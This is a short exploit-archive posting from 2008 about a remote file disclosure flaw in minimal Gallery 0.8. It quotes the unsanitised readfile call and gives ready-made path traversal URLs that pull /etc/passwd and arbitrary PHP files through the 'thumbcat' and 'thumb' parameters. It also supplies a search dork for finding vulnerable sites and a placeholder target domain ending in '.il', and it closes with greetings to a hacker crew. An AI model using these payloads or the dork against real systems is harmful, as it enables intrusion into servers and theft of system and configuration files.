minimal Gallery 0.8 Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : minimal Gallery 0.8 Remote File Disclosure Vulnerability
# Published : 2008-01-13
# Author : Houssamix
# Previous Title : Tribisur <= 2.0 Remote SQL Injection Exploit
# Next Title : Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit

# Script : minimal Gallery 0.8                                                  
# Download : http://minimaldesign.net/downloads/projects/minimal-gallery                         
# BUG :  Remote File Disclosure Vulnerability  
# Dork : powered by minimal Gallery 0.8
         
## Vulnerable CODE :
~~~~~~~~~ /_mg/php/mg_thumbs.php ~~~~~~~~~~~~~~~~~
readfile("../$thumbs_dir/$thumbcat$thumb");

the variables thumbcat & thumb are defined in page mg_thumbs.php like that : 
$thumbcat = $_GET['thumbcat'];
$thumb = $_GET['thumb'];
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~		 

# Exploit : 

[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumbcat=../../../../../../etc/passwd
[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumbcat=../../../../../../[file].php

[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumb=../../../../../../etc/passwd
[Target.il]/[Path_mGallery]/_mg/php/mg_thumbs.php?thumb=../../../../../../[file].php


# phpinfo(); View >> [Target.il]/[Path_mGallery]/php_info.php


# greezt :  coNan , GoLd_M , RoMaNcYxHaCkEr , Rachidox ,  and all muslims Hackers 

######################################################################################
#              H-T TeaM {HouSSaMix _ ToXiC350}  from MoRoCCo                         #
######################################################################################

# www.Syue.com [2008-01-13]